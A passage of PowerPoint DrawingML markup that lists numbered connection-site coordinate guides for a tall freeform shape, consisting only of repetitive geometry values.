              <a:gd name="connsiteY113" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY15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56043 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY15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0830 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY15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690830 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 756544 w 1605470"/>
